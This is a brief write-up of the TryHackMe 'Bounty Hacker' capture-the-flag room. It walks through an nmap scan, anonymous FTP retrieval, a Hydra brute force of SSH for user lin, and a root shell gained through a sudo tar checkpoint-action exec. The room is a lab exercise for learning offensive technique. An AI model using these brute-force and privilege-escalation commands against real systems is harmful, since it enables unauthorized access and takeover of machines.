Bounty Hacker — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Bounty Hacker — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -p- -v <ip>

nmap

As port 21(ftp) is opened and can be accessed by anonymous, let’s ftp to the machine.

ftp

Let’s get all the txt file to our machine.

mget *

Read content of those files.

task.txt

Now I know lin wrote this task.

The locks.txt file is a list of password, and it’s too long to capture here, so just read it yourselves.

We can use this file to bruteforce SSH, using Hydra.

hydra -l lin -P locks.txt ssh://10.10.75.253

Wait for Hydra to finish and I’ll have the password.

password

Now ssh to the machine as lin.

ssh

Get the 1st flag on Desktop

user.txt

Now I’ll try to get root to get the final flag. First, sudo -l to see if lin can run sudo.

sudo -l

Well lin can run tar as root. I can use tar to spawn a shell as root using this cmf:

sudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/sh

get root

Now get the final flag.

root.txt

The end.

HAPPY HACKING